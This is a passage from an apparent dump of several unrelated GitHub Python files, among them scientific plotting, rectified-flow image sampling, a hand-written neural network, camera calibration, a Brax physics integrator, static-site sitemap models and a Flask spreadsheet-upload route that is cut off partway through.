        runnums[s] = tmp_runnums
        # Mask to entries inside the [guard_time, guard_time_2] window.
        unixtimes_utimes = np.asarray([datetime.datetime.timestamp(b) for b in tmp_unixtimes])
        time_mask = unixtimes_utimes > guard_time
        time_mask = np.logical_and(time_mask, unixtimes_utimes < guard_time_2)
        masks[s] = time_mask

    # Phased-array (PA) data comes from a space-separated text file with one
    # column per channel.
    pa_data = np.genfromtxt('avgRMS_PA_SWTrigs.txt',
                            delimiter=' ',
                            names=['run', 'unixtime',
                                   '0', '1', '2', '3', '4', '5', '6', '7',
                                   '8', '9', '10', '11', '12', '13', '14', '15']
                            )
    pa_unixtimes = []
    for i in pa_data['unixtime']:
        pa_unixtimes.append(datetime.datetime.fromtimestamp(int(i)))
    pa_unixtimes = np.asarray(pa_unixtimes)
    unixtimes['pa'] = pa_unixtimes
    rms['pa'] = pa_data['1']  # channel 1 for the PA
    pa_unixtimes_utimes = np.asarray([datetime.datetime.timestamp(b) for b in pa_unixtimes])
    time_mask = pa_unixtimes_utimes > guard_time
    time_mask = np.logical_and(time_mask, pa_unixtimes_utimes < guard_time_2)
    print(time_mask)
    masks['pa'] = time_mask
    runnums['pa'] = pa_data['run']

    # Distinct marker per curve, cycling if there are more curves than markers.
    import itertools
    markers = itertools.cycle(('o', 's', '^', 'v', '>', '<'))

    fig = plt.figure(figsize=(10, 8))
    ax = fig.add_subplot(111)
    stations = [1, 2, 3, 4]
    for s in stations:
        the_mark = next(markers)
        ax.plot(unixtimes[s][masks[s]], rms[s][masks[s]], the_mark, label=f'Station {s}', alpha=0.2)
    the_mark = next(markers)
    ax.plot(unixtimes['pa'][masks['pa']], rms['pa'][masks['pa']],
            the_mark, label='PA & Station 5', alpha=0.2
            )
    leg = ax.legend(loc='upper right', ncol=2, markerscale=2.)
    for l in leg.legendHandles:
        # l._sizes = [30]
        # Legend markers drawn fully opaque even though the data is faint.
        l.set_alpha(1)
    ax.set_xlabel("Time")
    ax.set_ylabel("RMS of Noise Waveforms [mV]")
    ax.set_ylim([0, 100])
    ax = plt.gca()
    # start_time = int(1513317600)
    # stop_time = int(1547532000)
    # ax.set_xlim([start_time, stop_time])
    ax.set_xticklabels(ax.get_xticks(), rotation=45)
    # Format the x axis as year-month dates.
    import matplotlib.dates as md
    xfmt = md.DateFormatter('%Y-%m')
    # xfmt = md.DateFormatter('%Y')
    ax.xaxis.set_major_formatter(xfmt)
    plt.subplots_adjust(bottom=0.2)
    fig.tight_layout()
    fig.savefig("rms_vs_time.png")
# fig = plt.figure(figsize=(10, 8))
# ax = fig.add_subplot(111)
# ax.plot(runnums['pa'], unixtimes['pa'], 'o')
# ax.plot(runnums['pa'][masks['pa']], unixtimes['pa'][masks['pa']], 'o')
# import matplotlib.dates as md
# # xfmt = md.DateFormatter('%Y-%m-%d')
# xfmt = md.DateFormatter('%Y-%m')
# ax.yaxis.set_major_formatter(xfmt)
# plt.subplots_adjust(left=0.2)
# fig.tight_layout()
# fig.savefig("time_vs_runno_pa.png")
# del fig, ax
| clark2668/ara5_analysis | studies/2022.11_proposal/plot_rms/plot_rms.py | plot_rms.py | py | 5,522 | python | en | code | 0 | github-code | 90 |
2377499756 | # From https://colab.research.google.com/drive/1LouqFBIC7pnubCOl5fhnFd33-oVJao2J?usp=sharing#scrollTo=yn1KM6WQ_7Em
import torch
import numpy as np
from flows import RectifiedFlow
import torch.nn as nn
import tensorboardX
import os
from models import UNetEncoder
from guided_diffusion.unet import UNetModel
import torchvision.datasets as dsets
from torchvision import transforms
from torchvision.utils import save_image, make_grid
from utils import straightness
from dataset import CelebAHQImgDataset
import argparse
from tqdm import tqdm
from network_edm import SongUNet
from torch.nn import DataParallel
import json
from train_reverse_img_ddp import parse_config
def get_args():
    """Parse the sampling script's command-line arguments.

    Returns the populated ``argparse.Namespace`` (reads ``sys.argv``).
    """
    # BUG FIX: a bare ArgumentParser() was created and immediately
    # overwritten by the one below; the dead first assignment is removed.
    parser = argparse.ArgumentParser(description='Configs')
    parser.add_argument('--gpu', type=str, help='gpu index')
    parser.add_argument('--dir', type=str, help='Saving directory name')
    parser.add_argument('--ckpt', type=str, default=None, help='Flow network checkpoint')
    parser.add_argument('--batchsize', type=int, default=4, help='Batch size')
    parser.add_argument('--res', type=int, default=64, help='Image resolution')
    parser.add_argument('--input_nc', type=int, default=3, help='Unet num_channels')
    parser.add_argument('--N', type=int, default=20, help='Number of sampling steps')
    parser.add_argument('--num_samples', type=int, default=64, help='Number of samples to generate')
    parser.add_argument('--encoder', type=str, default=None, help='Encoder ckpt')
    parser.add_argument('--dataset', type=str, help='cifar10 / mnist / celebahq')
    parser.add_argument('--no_scale', action='store_true', help='Store true if the model is trained on [0,1] scale')
    parser.add_argument('--save_traj', action='store_true', help='Save the trajectories')
    parser.add_argument('--save_z', action='store_true', help='Save zs for distillation')
    parser.add_argument('--save_data', action='store_true', help='Save data')
    parser.add_argument('--solver', type=str, default='euler', help='ODE solvers')
    parser.add_argument('--config_de', type=str, default=None, help='Decoder config path, must be .json file')
    parser.add_argument('--config_en', type=str, default=None, help='Encoder config path, must be .json file')
    parser.add_argument('--seed', type=int, default=0, help='random seed')
    parser.add_argument('--rtol', type=float, default=1e-5, help='rtol for RK45 solver')
    parser.add_argument('--atol', type=float, default=1e-5, help='atol for RK45 solver')
    arg = parser.parse_args()
    return arg
def main(arg):
    """Sample images from a trained rectified-flow model.

    Builds the decoder (and, when ``arg.encoder`` is given, an encoder),
    loads checkpoints, integrates the flow ODE with the chosen solver, and
    writes samples / latents / trajectories / data plus two JSON summaries
    under ``arg.dir``.
    """
    if not os.path.exists(arg.dir):
        os.makedirs(arg.dir)
    assert arg.config_de is not None
    config = parse_config(arg.config_de)
    # Output sub-directories for the different artifact kinds.
    if not os.path.exists(os.path.join(arg.dir, "samples")):
        os.makedirs(os.path.join(arg.dir, "samples"))
    if not os.path.exists(os.path.join(arg.dir, "zs")):
        os.makedirs(os.path.join(arg.dir, "zs"))
    if not os.path.exists(os.path.join(arg.dir, "trajs")):
        os.makedirs(os.path.join(arg.dir, "trajs"))
    if not os.path.exists(os.path.join(arg.dir, "data")):
        os.makedirs(os.path.join(arg.dir, "data"))
    if config['unet_type'] == 'adm':
        model_class = UNetModel
    elif config['unet_type'] == 'songunet':
        model_class = SongUNet
    # Pass the arguments in the config file to the model
    flow_model = model_class(**config)
    device_ids = arg.gpu.split(',')
    if arg.ckpt is not None:
        flow_model.load_state_dict(torch.load(arg.ckpt, map_location = "cpu"))
    else:
        raise NotImplementedError("Model ckpt should be provided.")
    if len(device_ids) > 1:
        device = torch.device(f"cuda")
        print(f"Using {device_ids} GPUs!")
        flow_model = DataParallel(flow_model)
    else:
        device = torch.device(f"cuda:{arg.gpu}")
        print(f"Using GPU {arg.gpu}!")
    # Print the number of parameters in the model
    pytorch_total_params = sum(p.numel() for p in flow_model.parameters())
    # Convert to M
    pytorch_total_params = pytorch_total_params / 1000000
    print(f"Total number of parameters: {pytorch_total_params}M")
    flow_model = flow_model.to(device)
    rectified_flow = RectifiedFlow(device, flow_model, num_steps = arg.N)
    rectified_flow.model.eval()
    if arg.encoder is not None:
        from train_reverse_img_ddp import get_loader
        config_en = parse_config(arg.config_en)
        if config_en['unet_type'] == 'adm':
            encoder_class = UNetModel
        elif config_en['unet_type'] == 'songunet':
            encoder_class = SongUNet
        # Pass the arguments in the config file to the model
        encoder = encoder_class(**config_en)
        # encoder = SongUNet(img_resolution = arg.res, in_channels = arg.input_nc, out_channels = arg.input_nc * 2, channel_mult = [2,2,2], dropout = 0.13, num_blocks = 2, model_channels = 32)
        forward_model = UNetEncoder(encoder = encoder, input_nc = arg.input_nc)
        forward_model.load_state_dict(torch.load(arg.encoder, map_location = "cpu"), strict = True)
        forward_model = forward_model.to(device).eval()
        data_loader, _, _, _ = get_loader(arg.dataset, arg.batchsize, 1, 0)
        # dataset_train = CelebAHQImgDataset(arg.res, im_dir = 'D:\datasets\CelebAMask-HQ\CelebA-HQ-img-train-64')
        # dataloader_train = torch.utils.data.DataLoader(dataset_train, batch_size=arg.batchsize)
        train_iter = iter(data_loader)
    # Save configs as json file
    config_dict = vars(arg)
    with open(os.path.join(arg.dir, 'config_sampling.json'), 'w') as f:
        json.dump(config_dict, f, indent = 4)
    with torch.no_grad():
        i = 0
        epoch = arg.num_samples // arg.batchsize + 1
        x0_list = []
        straightness_list = []
        nfes = []
        z_norm_list = []
        for ep in tqdm(range(epoch)):
            noise = torch.randn(arg.batchsize, arg.input_nc, arg.res, arg.res).to(device)
            save_image(noise, "debug1.jpg")
            if arg.encoder is not None:
                x, _= next(train_iter)
                x = x.to(device)
                # x = x[1].repeat(arg.batchsize, 1, 1, 1)
                noise = noise[1].repeat(arg.batchsize, 1, 1, 1)
                z, _, _ = forward_model(x, noise = noise)
            else:
                z = noise
            # Compute the norm of z
            z_norm = torch.sum(z ** 2, dim = [1,2,3]).sqrt()
            z_norm_list.append(z_norm)
            save_image(z, "debug2.jpg")
            if arg.solver in ['euler', 'heun']:
                traj_uncond, traj_uncond_x0 = rectified_flow.sample_ode_generative(z1=z, N=arg.N, use_tqdm = False, solver = arg.solver)
                x0 = traj_uncond[-1]
                uncond_straightness = straightness(traj_uncond)
                straightness_list.append(uncond_straightness.item())
            else:
                x0, nfe = rectified_flow.sample_ode_generative_bbox(z1=z, N=arg.N, use_tqdm = False, solver = arg.solver, atol = arg.atol, rtol = arg.rtol)
                nfes.append(nfe)
                # print(f"nfe: {nfe}")
            # NOTE(review): --save_traj assumes an euler/heun solver; with a
            # black-box solver traj_uncond_x0 is never assigned — verify.
            if arg.save_traj:
                if len(traj_uncond_x0) > 10:
                    interval = len(traj_uncond_x0) // 5
                    grid = torch.cat(traj_uncond_x0[::interval], dim=3)
                else:
                    grid = torch.cat(traj_uncond_x0, dim=3) # grid.shape: (bsize, channel, H, W * N)
                if len(traj_uncond_x0) == 100:
                    idx = [0, 5, 10, 15, 20, 35, 50, 70, 99] # For visualization, currently hard-coded
                    grid = torch.cat([traj_uncond_x0[i] for i in idx], dim=3)
                # (batch_size, channel, H, W * N) -> (channel, H * bsize, W * N)
                grid = grid.permute(1, 0, 2, 3).contiguous().view(grid.shape[1], -1, grid.shape[3])
                save_image(grid * 0.5 + 0.5 if not arg.no_scale else grid, os.path.join(arg.dir, "trajs", f"{ep:05d}_traj.png"))
            for idx in range(len(x0)):
                save_image(x0[idx] * 0.5 + 0.5 if not arg.no_scale else x0[idx], os.path.join(arg.dir, "samples", f"{i:05d}.png"))
                # Save z as npy file
                if arg.save_z:
                    np.save(os.path.join(arg.dir, "zs", f"{i:05d}.npy"), z[idx].cpu().numpy())
                if arg.save_data:
                    save_image(x[idx] * 0.5 + 0.5 if not arg.no_scale else x[idx], os.path.join(arg.dir, "data", f"{i:05d}.png"))
                i+=1
                if i >= arg.num_samples:
                    break
            x0_list.append(x0)
        straightness_mean = np.mean(straightness_list)
        print(f"straightness_mean: {straightness_mean}")
        nfes_mean = np.mean(nfes) if len(nfes) > 0 else arg.N
        print(f"nfes_mean: {nfes_mean}")
        z_norms = torch.stack(z_norm_list).view(-1)
        result_dict = {"straightness_mean": straightness_mean, "z_norms": z_norms.tolist(), "nfes_mean": nfes_mean}
        with open(os.path.join(arg.dir, 'result_sampling.json'), 'w') as f:
            json.dump(result_dict, f, indent = 4)
if __name__ == "__main__":
    arg = get_args()
    # Restrict visible devices before any CUDA context is created.
    os.environ["CUDA_VISIBLE_DEVICES"] = arg.gpu
    torch.manual_seed(arg.seed)
    print(f"seed: {arg.seed}")
    # FIX: stripped dataset-dump metadata that was fused onto this line
    # ("| sangyun884/fast-ode | ..."), which made the file a syntax error.
    main(arg)
import random
import numpy as np
from TestingHelpfuncs import Helpfuncs as hf
import math
# Global variables (hyper-parameters for the network below)
SIZES = [28*28, 32, 10] # Number of nodes in: [input layer, hidden layer, ... , output layer]
EPOCHS = 10
BATCH_SIZE = 16
USED_SHARE_OF_DATA = 0.1  # fraction of the training set consumed per epoch
#LEARNING_RATE = 5
END_LEARNING_RATE = 0.1   # floor used by the polynomial-decay schedule
# Xavier/Glorot-style uniform initialisation bound: sqrt(6 / (fan_in + fan_out)).
WEIGHT_BOUND = math.pow(6/(SIZES[0]+SIZES[-1]), 0.5)
BIAS_BOUND = 0  # biases start at exactly zero
# A class representing a Neural Network
class Network:
    """Fully-connected feed-forward network trained with SGD or ADAM."""

    def __init__(self):
        # Layer sizes and count come from the module-level configuration.
        self.sizes = SIZES
        self.L = len(self.sizes)
        # Initialize weights and biases
        self.weights = []
        self.biases = []
        self.initialLR = 0     # learning rate at the start of training
        self.lr = 0            # current learning rate
        self.dr = 0            # decay rate used by some stepping schedules
        self.sc = ""           # name of the stepping schedule
        self.correct = 0       # correct classifications in the current epoch
        self.used = 0          # samples consumed in the current epoch
        self.lossFuncValues = []
        # One weight matrix / bias vector per layer transition.
        for i in range(0,self.L-1):
            self.weights.append(np.random.uniform(low=-WEIGHT_BOUND, high=WEIGHT_BOUND, size=(self.sizes[i+1],self.sizes[i])))
            self.biases.append(np.random.uniform(low=-BIAS_BOUND, high=BIAS_BOUND, size=(self.sizes[i+1])))
    # Calculates values of each node in next layer.
    def nextLayer(self, a, layer):
        """Apply layer `layer`'s affine transform and ReLU to activations `a`."""
        b = self.biases[layer]
        w = self.weights[layer]
        #a1 = hf.sigmoid(np.matmul(w, a) + b)
        a1 = hf.relu(np.matmul(w, a) + b)
        return a1
    # Loops through all the layers and creates a prediction
    def predict(self, image):
        """Forward-pass `image` through every layer; returns output activations."""
        a = hf.flatten(image)
        for l in range(0,self.L-1):
            a = self.nextLayer(a, l)
        return a
    # Trains the NN
    def train(self, train_X, train_y, test_X, test_y, steppingSched = "No stepping scheme", learningRate = 1, decayRate = 0):
        """Train with ADAM when steppingSched == "ADAM", else plain SGD.

        Returns four per-epoch histories:
        (trainAccVec, trainLossVec, testAccVec, testLossVec).
        """
        self.lr = learningRate
        self.dr = decayRate
        self.sc = steppingSched
        self.initialLR = learningRate
        if steppingSched == "ADAM":
            print("----------------------------------------")
            print("SGD-ADAM", ", Alpha = ", self.lr)
            print("----------------------------------------")
            trainAccVec, trainLossVec, testAccVec, testLossVec = self.SGDADAM(train_X, train_y, test_X, test_y)
        else:
            print("----------------------------------------")
            print("SGD, Stepping scheme = ",self.sc, ", Learning rate = ", self.lr, ", Decay rate = ", self.dr)
            print("----------------------------------------")
            trainAccVec, trainLossVec, testAccVec, testLossVec = self.SGD(train_X, train_y, test_X, test_y)
        return trainAccVec, trainLossVec, testAccVec, testLossVec
    # Updates the learning rate according to a stepping schedule
    def updateLearningRate(self, epoch):
        """Recompute self.lr for `epoch` using the configured schedule (self.sc).

        Unknown schedule names leave the learning rate unchanged.
        """
        if self.sc == "exponentialDecay":
            self.lr = hf.exponentialDecay(self.initialLR, self.dr, epoch)
        elif self.sc == "polynomialDecay":
            self.lr = hf.polynomialDecay(self.initialLR, END_LEARNING_RATE, epoch, EPOCHS)
        elif self.sc == "inverseTimeDecay":
            self.lr = hf.inverseTimeDecay(self.initialLR, self.dr, epoch)
        elif self.sc == "piecewiseConstantDecay":
            self.lr = hf.piecewiseConstantDecay(self.initialLR, epoch)
        else:
            pass
    # Calculates the gradient of loss function based on all weights and biases
    def stochasticGradient(self, train_X, train_y, trainLossVec):
        """Back-propagate a random mini-batch; returns (dw, db) averaged gradients.

        Also appends the batch's mean loss to `trainLossVec` and updates
        self.correct as a side effect.
        """
        changeWeights = [0]*(self.L-1)
        changeBiases = [0]*(self.L-1)
        lossFuncSum = 0
        for i in range(0, BATCH_SIZE):
            aVec = []       # activations per layer (input first)
            DVec = []       # diagonal matrices of activation derivatives
            deltaVec = []   # per-layer error terms
            # Samples are drawn with replacement.
            k = random.randint(0,len(train_X)-1)
            xk = train_X[k]
            yk = train_y[k]
            a = hf.flatten(xk)
            aVec.append(a)
            # Performs back-propagation for all layers
            for l in range(0,self.L-1):
                z = np.matmul(self.weights[l],a)+self.biases[l]
                a = hf.relu(z)
                D = np.diag(hf.reluPrim(z))
                #a = hf.sigmoid(z)
                #D = np.diag(hf.sigmoidPrim(z))
                aVec.append(a)
                DVec.append(D)
            # Output-layer error, then propagate backwards.
            delta_L = np.matmul(DVec[-1],(a-hf.formatY(yk)))
            deltaVec.append(delta_L)
            for l in reversed(range(-self.L+1, -1)):
                delta_l = np.matmul(DVec[l], np.matmul(np.transpose(self.weights[l+1]), deltaVec[l+1]))
                deltaVec.insert(0, delta_l)
            for l in reversed(range( -self.L+1, 0)):
                changeBiases[l] += deltaVec[l]
                changeWeights[l] += np.outer(deltaVec[l], aVec[l-1])
            prediction = max(aVec[-1])
            # NOTE(review): .index() only exists on Python lists; this assumes
            # hf.relu returns a list rather than a numpy array — verify.
            index = aVec[-1].index(prediction)
            if (index == int(yk)):
                self.correct += 1
            lossFuncSum += hf.lossFunc(aVec[-1], yk)
        trainLossVec.append(lossFuncSum/BATCH_SIZE)
        # Calculates average values
        dw = [cw/BATCH_SIZE for cw in changeWeights]
        db = [cb/BATCH_SIZE for cb in changeBiases]
        return dw, db
    # Trains the network based on Stochastic Gradient Descent
    def SGD(self, train_X, train_y, test_X, test_y):
        """Plain mini-batch SGD; returns per-epoch accuracy/loss histories."""
        trainLossVec = []
        testAccVec = []
        testLossVec = []
        trainAccVec = []
        # Epoch loop
        for i in range(1,EPOCHS+1):
            self.correct = 0
            self.used = 0
            # Batch loop
            for j in range(1, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE)+1):
                dw, db = self.stochasticGradient(train_X, train_y, trainLossVec)
                self.used += BATCH_SIZE
                """print("\n", self.weights[1][5][5], "\n")
                input()"""
                # Layer loop: vanilla gradient step.
                for l in range(1, self.L):
                    self.weights[l-1] -= self.lr*dw[l-1]
                    self.biases[l-1] -= self.lr*db[l-1]
                hf.progress_bar(j, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE), EPOCHS, i, round(100*self.correct/(self.used), 4))
            testAcc, testLoss = hf.test(self, 50, test_X, test_y)
            testAccVec.append(testAcc)
            testLossVec.append(testLoss)
            trainAcc = self.correct/self.used
            trainAccVec.append(trainAcc)
            self.updateLearningRate(i)
        #loss = hf.averageLoss(self.lossFuncValues)
        return trainAccVec, trainLossVec, testAccVec, testLossVec
# Trains the network based on ADAM
def SGDADAM(self, train_X, train_y, test_X, test_y):
trainLossVec = []
testAccVec = []
testLossVec = []
trainAccVec = []
beta1 = 0.9
beta2 = 0.999
epsilon = 1e-8
alpha = self.lr
t = 1
Vdw = [0]*(self.L-1)
Sdw = [0]*(self.L-1)
Vdb = [0]*(self.L-1)
Sdb = [0]*(self.L-1)
# Epoch loop
for i in range(1, EPOCHS+1):
self.correct = 0
self.used = 0
# Minibatch loop
for j in range(1, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE+1)):
dw, db = self.stochasticGradient(train_X, train_y, trainLossVec)
self.used += BATCH_SIZE
"""print("\n", self.weights[1][5][5], "\n")
input()"""
# Layer loop
for l in range(1, self.L):
# Update first and second moments
Vdw[l-1] = beta1*Vdw[l-1] + (1-beta1)*dw[l-1]
Vdb[l-1] = beta1*Vdb[l-1] + (1-beta1)*db[l-1]
Sdw[l-1] = beta2*Sdw[l-1] + (1-beta2)*(np.square(dw[l-1]))
Sdb[l-1] = beta2*Sdb[l-1] + (1-beta2)*(np.square(db[l-1]))
# Get corrected values
Vdwcor = Vdw[l-1]/(1-beta1**t)
Vdbcor = Vdb[l-1]/(1-beta1**t)
Sdwcor = Sdw[l-1]/(1-beta2**t)
Sdbcor = Sdb[l-1]/(1-beta2**t)
# Update weights and biases
cw = np.divide(Vdwcor, np.sqrt(Sdwcor)+epsilon)
cb = np.divide(Vdbcor, np.sqrt(Sdbcor)+epsilon)
self.weights[l-1] -= alpha*cw
self.biases[l-1] -= alpha*cb
t += 1
#hf.progress_bar(j, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE), EPOCHS, i, round(100*self.correct/(self.used), 2))
testAcc, testLoss = hf.test(self, 10000, test_X, test_y)
trainAcc = self.correct/self.used
trainAccVec.append(trainAcc)
testAccVec.append(testAcc)
testLossVec.append(testLoss)
#loss = hf.averageLoss(self.lossFuncValues)
return trainAccVec, trainLossVec, testAccVec, testLossVec | axeboii/Neural-Network | Visualisation/TestingNetwork.py | TestingNetwork.py | py | 8,902 | python | en | code | 0 | github-code | 90 |
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def binaryTreePaths(self, root):
        """
        :type root: TreeNode
        :rtype: List[str]
        """
        collected = []
        self.dfs(root, [], collected)
        return collected

    def dfs(self, root, path_list, res):
        # Depth-first walk; `path_list` holds the node values on the current
        # root-to-here path and is restored before returning.
        if not root:
            return
        path_list.append(str(root.val))
        children = [child for child in (root.left, root.right) if child]
        if not children:
            # Leaf reached: materialise the accumulated path.
            res.append('->'.join(path_list))
        for child in children:
            self.dfs(child, path_list, res)
        path_list.pop()
# ---- dataset metadata (repo: Eurus-Holmes/LCED, file: Binary Tree Paths.py) ----
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#importing the dataset (Netflix stock prices; column 2 = High, column 3 = Low)
dataset = pd.read_csv('NFLX.csv')
X = dataset.iloc[:,2:3].values
y = dataset.iloc[:,3].values

#Fitting the decision tree Regression to the dataset
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state=0)
regressor.fit(X,y)

# Predict the Low for a single High value of 300.
y_pred = regressor.predict([[300]])

#Visualising the graph
X_grid = np.arange(min(X),max(X),0.01) #Return evenly spaced values within a given interval
X_grid = X_grid.reshape((len(X_grid),1))
# we need to minimise the step size so we use minimum range and maximum range of X with stepsize of 0.01
# we reshape X_grid into a matrix with len(X_grid) rows and 1 column, as predict expects 2-D input
plt.scatter(X,y,color='red')
plt.plot(X_grid,regressor.predict(X_grid),color='blue')
plt.title('Stock prediction(Decison tree)')
plt.xlabel('High')
plt.ylabel('Low')
plt.show()
# ---- dataset metadata (repo: sumit-mandal/Stock_price..., file: Decision_tree_without_testset.py) ----
import cv2
import numpy as np
import matplotlib.pyplot as plt
# termination criteria for the computation (epsilon + iteration count)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)

# prepare the object points in the form: (0, 0, 0), (1, 0, 0), (2, 0, 0), ..., (6, 7, 0)
objp = np.zeros((6 * 7, 3), np.float32)
objp[:, :2] = np.mgrid[0:7, 0:6].T.reshape(-1, 2)

# arrays to hold object points (3D) and image points (2D) for all images
objpoints = [] # 3d points in (real-world) space
imgpoints = [] # 2d points in the image plane.

for i in range(1,13):
    # read the image
    img = cv2.imread('images_left/left%02d.jpg' % i)
    # convert to grayscale
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # look for chessboard corners in the image
    ret, corners = cv2.findChessboardCorners(gray, (7, 6), None)
    # if corners were found in the image
    if ret == True:
        # append the 3D coordinates
        objpoints.append(objp)
        # refine corner locations (sub-pixel accuracy)
        corners2 = cv2.cornerSubPix(gray, corners, (11, 11), (-1, -1), criteria)
        # append the refined points
        imgpoints.append(corners2)
        # visualise the detected corners
        cv2.drawChessboardCorners(img, (7, 6), corners2, ret)
        cv2.imshow("Corners", img)
        cv2.waitKey(0)

cv2.destroyAllWindows() if False else None  # NOTE(review): windows are never closed — consider cv2.destroyAllWindows()
# ---- dataset metadata (repo: Maveric4/ZAW, file: cam_cal.py) ----
from brax import jumpy as jp
from brax import math
from brax import pytree
from brax.physics import config_pb2
from brax.physics.base import P, QP, vec_to_arr
@pytree.register
class Euler:
  """Symplectic euler integration."""

  def __init__(self, config: config_pb2.Config):
    """Creates a Euler integrator.

    Args:
      config: brax config
    """
    # Masks zero-out position/rotation updates for frozen degrees of freedom.
    self.pos_mask = 1. * jp.logical_not(
        jp.array([vec_to_arr(b.frozen.position) for b in config.bodies]))
    self.rot_mask = 1. * jp.logical_not(
        jp.array([vec_to_arr(b.frozen.rotation) for b in config.bodies]))
    # Sub-step timestep: each physics step is split into config.substeps parts.
    self.dt = config.dt / config.substeps
    self.gravity = vec_to_arr(config.gravity)
    self.velocity_damping = config.velocity_damping
    self.angular_damping = config.angular_damping

  def kinetic(self, qp: QP) -> QP:
    """Performs a kinetic integration step.

    Args:
      qp: State data to be integrated

    Returns:
      State data advanced by one kinematic integration step.
    """
    @jp.vmap
    def op(qp, pos_mask, rot_mask) -> QP:
      pos = qp.pos + qp.vel * self.dt * pos_mask
      # Quaternion derivative: dq/dt = 0.5 * ang_quat * q, integrated explicitly
      # and re-normalised to stay a unit quaternion.
      rot_at_ang_quat = math.ang_to_quat(qp.ang * rot_mask) * 0.5 * self.dt
      rot = qp.rot + math.quat_mul(rot_at_ang_quat, qp.rot)
      rot = rot / jp.norm(rot)
      return QP(pos, rot, qp.vel, qp.ang)

    return op(qp, self.pos_mask, self.rot_mask)

  def potential(self, qp: QP, dp: P) -> QP:
    """Performs a potential integration step.

    Args:
      qp: State data to be integrated
      dp: Impulses to apply during this potential step

    Returns:
      State data advanced by one potential integration step.
    """
    @jp.vmap
    def op(qp, dp, pos_mask, rot_mask) -> QP:
      # Exponential damping factor; assumes damping coefficients are <= 0 so
      # the factor is <= 1 — NOTE(review): verify sign convention in config.
      vel = jp.exp(self.velocity_damping * self.dt) * qp.vel
      vel += (dp.vel + self.gravity) * self.dt
      vel *= pos_mask
      ang = jp.exp(self.angular_damping * self.dt) * qp.ang
      ang += dp.ang * self.dt
      ang *= rot_mask
      return QP(pos=qp.pos, rot=qp.rot, vel=vel, ang=ang)

    return op(qp, dp, self.pos_mask, self.rot_mask)

  def potential_collision(self, qp: QP, dp: P) -> QP:
    """Performs a potential collision integration step.

    Args:
      qp: State data to be integrated
      dp: Velocity-level collision updates to apply this integration step

    Returns:
      State data advanced by one velocity-level update.
    """
    @jp.vmap
    def op(qp, dp, pos_mask, rot_mask) -> QP:
      vel = (qp.vel + dp.vel) * pos_mask
      ang = (qp.ang + dp.ang) * rot_mask
      return QP(pos=qp.pos, rot=qp.rot, vel=vel, ang=ang)

    return op(qp, dp, self.pos_mask, self.rot_mask)
# ---- dataset metadata (repo: belinghy/BraxPlayground, file: integrators.py) ----
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from urllib.parse import urljoin
from config import Config
@dataclass
class MarkdownPage():
    """Parsed markdown page plus its front-matter metadata."""

    template: str            # name of the template used to render this page
    content: str             # page body — presumably rendered HTML; verify at call site
    summary: str
    title: str | None
    date: datetime
    keywords: str | None
    slug: str | None
    toc: list                # table-of-contents entries
    category: str | None
    hide_toc: bool           # suppress the table of contents when True
@dataclass
class LinkInfo:
    """URL/title pair used for prev/next post links."""

    url: str
    title: str
@dataclass
class Navigation:
    """Older/newer navigation for a post identified by its path."""

    path: str                            # post path without the leading slash
    older_link: LinkInfo | None = None   # link to the previous (older) post
    newer_link: LinkInfo | None = None   # link to the next (newer) post

    @property
    def url(self):
        """Site-absolute URL for this post."""
        return f'/{self.path}'
@dataclass
class Post:
    """A post: the parsed markdown page plus its navigation links."""

    markdown_page: MarkdownPage
    navigation: Navigation

    @property
    def as_view_context(self):
        """Flatten page and navigation fields into one dict for templates.

        The computed `url` property is added explicitly because dataclasses'
        asdict() only captures declared fields, not properties.
        """
        d = asdict(self.markdown_page)
        d.update(asdict(self.navigation))
        d['url'] = self.navigation.url
        return d
@dataclass
class SiteMapRecord:
    """One URL entry of the generated sitemap."""

    relative_path: str       # path relative to the site root ("" means the base URL)
    updated_at: datetime     # last modification time; rendered in UTC
    priority: float = 1.0    # sitemap <priority> value

    @property
    def lastmod(self):
        """`updated_at` converted to UTC and formatted as a W3C datetime string."""
        return self.updated_at.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")

    def loc(self, config: Config):
        """Absolute URL for this record, joined onto `config.base_url`."""
        if self.relative_path is None or self.relative_path == "":
            return config.base_url
        else:
            return urljoin(config.base_url, str(self.relative_path))
@dataclass
class SiteMapData:
    """Container for all sitemap records."""

    records: list[SiteMapRecord] = field(default_factory=list)
# ---- dataset metadata (repo: amirkarimi.github.io, file: models.py) ----
import os
from config import ADMINS
from flask import Flask, request, render_template, redirect, url_for,Blueprint,g,current_app,send_from_directory
from werkzeug.utils import secure_filename
from pyexcel_xls import XLBook
from .forms import UploadForm,SendEmailsForm
from ..models import Topic, User, Format, Content,Role_menu, Menu,Event,EventAttender
from app import db
import xlrd, re,random
from werkzeug.security import generate_password_hash
from ..emails import send_email
from flask.ext.login import login_user, logout_user, current_user, login_required
import urllib
import urllib.request
import requests
upload = Blueprint('upload', __name__)
# Module-level state refreshed by before_request for every request.
# NOTE(review): module globals are shared between concurrent requests —
# per-request values belong on flask.g instead; verify under load.
full_name = ''
status = ''
menu_categories = list()
UPLOAD_FOLDER = 'uploads/'   # destination for uploaded spreadsheets
@upload.route('/upload_file', methods=['GET', 'POST'])
@login_required
def upload_file():
    """Import page: save the uploaded spreadsheet and load it into the DB.

    The form's choice switcher selects whether the file is imported as
    users or as topics.
    """
    form = UploadForm()
    if form.validate_on_submit():
        filename = secure_filename(form.upload.data.filename)
        fpath = UPLOAD_FOLDER + filename
        form.upload.data.save(fpath)
        value = form.choice_switcher.data
        if value == 'user':
            input_user_xls(fpath)
        elif value == 'topic':
            # BUG FIX: previously compared `filename == 'topic'`, which never
            # matched a real upload name such as "topic.xlsx", so topic
            # imports were silently skipped.
            input_topic_xls(fpath)
        message=" import successfully"
    else:
        filename = None
        message=" import failed"
    return render_template('upload/upload.html', form=form, filename=filename,message=message,full_name=full_name, menu_categories=menu_categories, status=status)
@upload.route('/send_emails', methods=['GET', 'POST'])
@login_required
